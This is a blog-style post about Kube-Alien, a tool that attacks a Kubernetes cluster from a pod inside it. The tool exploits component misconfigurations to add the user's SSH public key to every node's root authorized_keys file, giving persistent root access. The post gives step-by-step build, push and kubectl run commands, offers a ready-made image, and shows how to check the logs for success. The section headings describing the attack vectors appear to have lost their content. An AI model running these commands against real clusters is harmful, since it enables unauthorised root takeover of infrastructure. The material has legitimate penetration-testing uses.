Kube-Alien tool launches attack on k8s cluster from within. That means you already need to have an access with permission to deploy pods in a cluster to run it.
After running the kube-alien pod it tries to takeover cluster’s nodes by adding your public key to node’s /root/.ssh/authorized_keys file by using this image https://github.com/nixwizard/dockercloud-authorizedkeys (Can be adjusted using ADD_AUTHKEYS_IMAGE param in config.py) forked from docker/dockercloud-authorizedkeys.
Also Read – Firmware Analysis Toolkit : To Emulate Firmware And Analyse It For Security Vulnerabilities
The attack succeedes if there is a misconfiguration in one of the cluster’s components it goes along the following vectors:
The purpose of this tool
How can k8s cluster be attacked from within in a real life
Kube-alien image should be pushed to your dockerhub(or other registry) before using with this tool.
git clone https://github.com/nixwizard/kube-alien.git
cd kube-alien
docker build -t ka ./
docker tag ka YOUR_DOCKERHUB_ACCOUNT/kube-alien:ka
docker push YOUR_DOCKERHUB_ACCOUNT/kube-alien:ka
The AUTHORIZED_KEYS env required to be set to the value of your ssh public key, in case of success the public key will be added to all node’s root’s authorized_keys file.
kubectl run –image=YOUR_DOCKERHUB_ACCOUNT/kube-alien:ka kube-alien –env=”AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)” –restart Never
or you may use my image for quick testing purpose:
kubectl run –image=nixwizard/kube-alien kube-alien:ka –env=”AUTHORIZED_KEYS=$(cat ~/.ssh/id_rsa.pub)” –restart Never
Check Kube-alien pod’s logs to see if attack was successful:
kubectl logs $(kubectl get pods| grep alien|cut -f1 -d’ ‘)
AutoExif is a powerful Bash script designed to streamline the process of editing image metadata…
SimpleImager V4.3, your go-to tool for streamlined system imaging and data acquisition. Designed to simplify…
MetaOSINT enables open source intelligence ("OSINT") practitioners to jumpstart their investigations by quickly identifying relevant,…
ThreatPinch Lookup creates informational tooltips when hovering oven an item of interest on any website.…
Myself and any other potential contributors to this website are NOT in any way affiliated…
The Mobile Evidence Acquisition Toolkit designed by BlackStone Discovery. Developed to enhance digital forensics, this…